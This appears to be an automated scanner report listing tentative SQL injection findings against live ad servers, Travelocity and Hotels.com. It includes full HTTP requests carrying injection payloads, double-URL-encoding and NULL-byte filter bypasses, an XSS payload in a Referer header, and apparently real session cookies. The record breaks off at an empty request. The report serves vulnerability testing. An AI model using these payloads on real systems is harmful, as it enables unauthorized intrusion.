var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick
...[SNIP]...

1.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.10. http://adserver.adtech.de/addyn|3.0|999|3106006|0|168|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|999|3106006|0|168|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19466

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_3106006(i) {
var sVersion_3106006 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2131

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...

1.11. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176 [NGUserID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The NGUserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NGUserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00'; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 1

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:33 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.26:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:33 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 5531
Content-Type: text/html

<META HTTP-EQUIV="Content-type" CONTENT="text/html;charset=ISO-8859-1">
<!-- Sniffer Code for Flash version=100 -->
<SCRIPT LANGUAGE=JavaScript>
<!--
var swf_click = "http://dm.travelocity.com/event.n
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00''; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 2

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:34 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:34 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 794
Content-Type: text/html

<a target="_new" href="/event.ng/Type=click&FlightID=57279&AdID=88855&TargetID=8870&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,22308,22422,22783,22972,22974,23055
...[SNIP]...

1.12. http://www.hotels.com/compare/hotel_dockingbar.html [SSPV cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSPV cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the SSPV cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:30 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.13. http://www.hotels.com/compare/hotel_dockingbar.html [SSRT cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSRT cookie appears to be vulnerable to SQL injection attacks. The payloads 17075075'%20or%201%3d1--%20 and 17075075'%20or%201%3d2--%20 were each submitted in the SSRT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d1--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

